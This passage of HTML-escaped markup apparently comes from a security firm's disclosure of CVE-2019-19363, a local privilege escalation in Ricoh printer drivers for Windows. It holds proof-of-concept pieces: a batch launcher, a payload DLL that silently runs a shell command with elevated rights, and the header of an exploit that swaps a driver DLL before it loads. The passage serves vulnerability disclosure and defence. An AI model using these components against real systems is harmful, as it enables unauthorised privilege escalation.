&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-12"&gt;&lt;code data-line-number="12"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-12" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-12"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-13"&gt;&lt;code data-line-number="13"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-13" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-13"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-14"&gt;&lt;code data-line-number="14"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-14" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-14"&gt;&lt;/a&gt;PoC.exe &lt;span class="se"&gt;^&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-15"&gt;&lt;code data-line-number="15"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-15" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-15"&gt;&lt;/a&gt;&lt;span class="se"&gt; &lt;/span&gt;  &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;%PRINTERNAME%&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;^&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-16"&gt;&lt;code data-line-number="16"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-16" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-16"&gt;&lt;/a&gt;&lt;span class="se"&gt; &lt;/span&gt;  &lt;span class="s2"&gt;"C:\ProgramData\RICOH_DRV\&lt;/span&gt;&lt;span class="nv"&gt;%PRINTERNAME%&lt;/span&gt;&lt;span class="s2"&gt;\_common\dlz\&lt;/span&gt;&lt;span class="nv"&gt;%DLL%&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;^&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-17"&gt;&lt;code data-line-number="17"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-17" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-17"&gt;&lt;/a&gt;&lt;span class="se"&gt; &lt;/span&gt;  &lt;span class="s2"&gt;"RICOH_DRV\&lt;/span&gt;&lt;span class="nv"&gt;%PRINTERNAME%&lt;/span&gt;&lt;span class="s2"&gt;\_common\dlz\&lt;/span&gt;&lt;span class="nv"&gt;%DLL%&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;^&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-18"&gt;&lt;code data-line-number="18"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-18" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-18"&gt;&lt;/a&gt;&lt;span class="se"&gt; &lt;/span&gt;  Dll.dll &lt;span class="se"&gt;^&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-19"&gt;&lt;code data-line-number="19"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-19" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-19"&gt;&lt;/a&gt;&lt;span class="se"&gt; &lt;/span&gt;  &lt;span class="nv"&gt;%STEPS%&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-20"&gt;&lt;code data-line-number="20"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-20" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-20"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-21"&gt;&lt;code data-line-number="21"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-21" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-21"&gt;&lt;/a&gt;&lt;span class="c1"&gt;REM Wait for a moment&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-22"&gt;&lt;code data-line-number="22"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-22" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-22"&gt;&lt;/a&gt;timeout /t 5
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-23"&gt;&lt;code data-line-number="23"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-23" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-23"&gt;&lt;/a&gt;&lt;span class="k"&gt;dir&lt;/span&gt; c:\result.txt
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;/section&gt;
&lt;section id="payload-dll"&gt;
&lt;h3&gt;2. Payload DLL&lt;/h3&gt;
&lt;div class="code"&gt;&lt;table class="codetable"&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-1"&gt;&lt;code data-line-number=" 1"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-1" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-1"&gt;&lt;/a&gt;&lt;span class="cm"&gt;/*&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-2"&gt;&lt;code data-line-number=" 2"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-2" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-2"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-3"&gt;&lt;code data-line-number=" 3"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-3" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-3"&gt;&lt;/a&gt;&lt;span class="cm"&gt;This proof of concept DLL executes a shell command with elevated privileges.&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-4"&gt;&lt;code data-line-number=" 4"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-4" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-4"&gt;&lt;/a&gt;&lt;span class="cm"&gt;Written by Pentagrid AG, 2019.&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-5"&gt;&lt;code data-line-number=" 5"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-5" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-5"&gt;&lt;/a&gt;&lt;span class="cm"&gt;Cf. https://pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-6"&gt;&lt;code data-line-number=" 6"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-6" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-6"&gt;&lt;/a&gt;&lt;span class="cm"&gt;*/&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-7"&gt;&lt;code data-line-number=" 7"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-7" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-7"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-8"&gt;&lt;code data-line-number=" 8"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-8" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-8"&gt;&lt;/a&gt;&lt;span class="cp"&gt;#include&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="cpf"&gt;"stdafx.h"&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-9"&gt;&lt;code data-line-number=" 9"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-9" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-9"&gt;&lt;/a&gt;&lt;span class="cp"&gt;#include&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="cpf"&gt;&amp;lt;shellapi.h&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-10"&gt;&lt;code data-line-number="10"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-10" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-10"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-11"&gt;&lt;code data-line-number="11"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-11" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-11"&gt;&lt;/a&gt;&lt;span class="n"&gt;BOOL&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;WINAPI&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;DllMain&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;HMODULE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;hModule&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-12"&gt;&lt;code data-line-number="12"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-12" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-12"&gt;&lt;/a&gt;&lt;span class="w"&gt;                       &lt;/span&gt;&lt;span class="n"&gt;DWORD&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="n"&gt;ul_reason_for_call&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-13"&gt;&lt;code data-line-number="13"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-13" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-13"&gt;&lt;/a&gt;&lt;span class="w"&gt;                       &lt;/span&gt;&lt;span class="n"&gt;LPVOID&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;lpReserved&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-14"&gt;&lt;code data-line-number="14"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-14" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-14"&gt;&lt;/a&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="n"&gt;WinExec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"cmd.exe /c whoami &amp;gt; c:&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s"&gt;result.txt"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;SW_HIDE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-15"&gt;&lt;code data-line-number="15"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-15" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-15"&gt;&lt;/a&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;TRUE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_5533e32507504bfc97ded1d25c21d2fa-16"&gt;&lt;code data-line-number="16"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_5533e32507504bfc97ded1d25c21d2fa-16" name="rest_code_5533e32507504bfc97ded1d25c21d2fa-16"&gt;&lt;/a&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;/section&gt;
&lt;section id="exploit"&gt;
&lt;h3&gt;3. Exploit&lt;/h3&gt;
&lt;div class="code"&gt;&lt;table class="codetable"&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-1"&gt;&lt;code data-line-number="  1"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-1" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-1"&gt;&lt;/a&gt;&lt;span class="cm"&gt;/*&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-2"&gt;&lt;code data-line-number="  2"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-2" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-2"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-3"&gt;&lt;code data-line-number="  3"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-3" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-3"&gt;&lt;/a&gt;&lt;span class="cm"&gt;This proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-4"&gt;&lt;code data-line-number="  4"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-4" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-4"&gt;&lt;/a&gt;&lt;span class="cm"&gt;a DLL file before the library is loaded (CVE-2019-19363).&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-5"&gt;&lt;code data-line-number="  5"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-5" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-5"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-6"&gt;&lt;code data-line-number="  6"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-6" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-6"&gt;&lt;/a&gt;&lt;span class="cm"&gt;Written by Pentagrid AG, 2019.&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-7"&gt;&lt;code data-line-number="  7"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-7" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-7"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-8"&gt;&lt;code data-line-number="  8"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-8" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-8"&gt;&lt;/a&gt;&lt;span class="cm"&gt;Cf. https://pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-9"&gt;&lt;code data-line-number="  9"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-9" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-9"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-10"&gt;&lt;code data-line-number=" 10"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-10" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-10"&gt;&lt;/a&gt;&lt;span class="cm"&gt;Credits: Alexander Pudwill&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-11"&gt;&lt;code data-line-number=" 11"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-11" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-11"&gt;&lt;/a&gt;
